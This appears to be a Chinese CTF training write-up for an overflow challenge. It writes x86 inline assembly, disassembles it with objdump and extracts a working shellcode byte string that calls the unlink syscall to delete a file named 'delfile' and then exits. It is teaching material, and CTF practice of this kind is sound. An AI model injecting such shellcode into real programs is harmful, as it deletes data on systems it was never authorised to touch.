西普CTF训练（溢出）

1、加减乘除 http://ctf1.simplexue.com/overflow/1/
给定一段汇编代码，求shellcode
linux下编写c代码

void  main()
{
asm(  
    "_start:\n\t"
         "jmp     test1\n\t"
         "test2:\n\t"
         "pop    %ebx\n\t"
         "movb    $0xa,%al\n\t"
         "int     $0x80\n\t"
         "movb    $0x1,%al\n\t"
         "xor     %ebx, %ebx\n\t"
        "int     $0x80\n\t"
     "test1:\n\t"
         "call    test2\n\t"
         ".string \"delfile\"");
}

使用gcc编译shellcodeasm.c，再用objdump生成

**objdump -j .text -Sl shellcodeasm | more**
080483dc <main>:
main():
/home/gwen/Desktop/ntt.c:3
 80483dc:   55                      push   %ebp
 80483dd:   89 e5                   mov    %esp,%ebp

080483df <_start>:
/home/gwen/Desktop/ntt.c:4
 80483df:   eb 0b                   jmp    80483ec <test1>

080483e1 <test2>:
 80483e1:   5b                      pop    %ebx
 80483e2:   b0 0a                   mov    $0xa,%al
 80483e4:   cd 80                   int    $0x80
 80483e6:   b0 01                   mov    $0x1,%al
 80483e8:   31 db                   xor    %ebx,%ebx
 80483ea:   cd 80                   int    $0x80

080483ec <test1>:
 80483ec:   e8 f0 ff ff ff          call   80483e1 <test2>
 80483f1:   64                      fs
 80483f2:   65                      gs
 80483f3:   6c                      insb   (%dx),%es:(%edi)
 80483f4:   66 69 6c 65 00 5d c3    imul   $0xc35d,0x0(%ebp,%eiz,2),%bp

找到对应的汇编代码，将code拼起来（00之前的code）即可：\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xf0\xff\xff\xff\x64\x65\x6c\x66\x69\x6c\x65